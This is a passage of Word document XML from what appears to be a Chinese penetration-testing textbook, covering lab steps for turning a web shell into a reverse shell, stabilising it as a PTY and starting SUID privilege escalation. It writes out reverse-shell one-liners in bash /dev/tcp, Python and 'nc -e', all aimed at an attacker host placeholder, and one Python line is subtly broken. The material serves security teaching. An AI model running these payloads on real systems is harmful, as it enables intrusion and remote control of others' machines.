        <w:t xml:space="preserve">或其他防病毒引擎进行扫描（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节主机加固清单）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="393"/>
    <w:bookmarkStart w:id="394" w:name="步骤六从-web-shell-升级到反向-shell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤六：从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">升级到反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求驱动，交互性差，且所有命令都在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器日志中留下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数痕迹。渗透测试中通常需要升级为反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell（Reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell），以获得一个稳定的交互式终端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接建立和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向原理已见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Metasploit/手工</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload）；TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流套接字和文件描述符重定向的底层机制见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上启动监听器，通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行反弹命令）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># === 在 Kali 宿主机上 ===</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 使用 ncat 启动监听</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-lvnp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># === 在目标 Web Shell 上（通过浏览器 URL 或 curl 执行）===</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 经典的 Bash 反向 Shell（代码示例为教学常用 payload，需确保靶机装有 bash③）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># URL 编码前（需根据 Web Shell 的传输方式决定是否编码）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># bash -c 'exec bash -i &amp;&gt;/dev/tcp/&lt;KALI_IP&gt;/&lt;LPORT&gt; &lt;&amp;1'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># URL 编码后（用于 GET 参数传递）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># bash%20-c%20%27exec%20bash%20-i%20%26%3E%2Fdev%2Ftcp%2F&lt;KALI_IP&gt;%2F&lt;LPORT&gt;%20%3C%261%27 ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 若 bash 反弹失败，尝试其他 payload：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - Python 反向 Shell:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;KALI_IP&gt;",&lt;LPORT&gt;));os.dup2(s.fileno,0);os.dup2(s.fileno,1);os.dup2(s.fileno,2);subprocess.call(["/bin/sh","-i"])' ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - Netcat 反向 Shell（若靶机配有 nc）:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># nc -e /bin/sh &lt;KALI_IP&gt; &lt;LPORT&gt; ②</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终端收到来自目标靶机的连接，并显示一个类似于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的简陋提示符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令应返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=33(www-data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，确认是同一用户。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若得到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能有限（如无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">补全、Ctrl+C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会断开连接），需要在下一步进行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">升级。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="394"/>
    <w:bookmarkStart w:id="395" w:name="步骤七shell-升级与稳定性增强"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤七：Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">升级与稳定性增强</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是“哑终端”（dumb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal），不支持交互式程序（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），且容易因网络波动断开。需要将其升级为一个完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PTY（Pseudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 在反向 Shell 中，生成一个 PTY</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pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 按 Ctrl+Z 将当前 nc 会话放入后台（在 Kali 终端操作）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># CTRL+Z</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 在 Kali 终端中配置终端环境并恢复前台进程</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">stty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 然后按 Enter 两次</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. 设置终端类型</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TERM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 此时 Shell 应支持命令历史、Tab 补全、Ctrl+C 等交互功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- PTY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">升级前后对比：升级前的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时直接报错“must</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be run from a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal”；升级后则可正常输入密码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">stty raw -echo; fg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，键入字符时可能看不见回显，这是正常的。按两次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后应恢复正常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="395"/>
    <w:bookmarkStart w:id="396" w:name="步骤八权限提升linux-suid-提权"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤八：权限提升——Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型、SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制、内核提权的基本原理已见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）。SUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制文件在执行时，进程的有效用户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ID（euid）为文件所有者（通常为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root），若该程序存在可被利用的缺陷（如命令注入、路径遍历），低权限用户可借此执行任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码——这违反了“最小权限原则”中的进程权限边界假设①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务通常以</w:t>
      </w:r>
      <w:r>
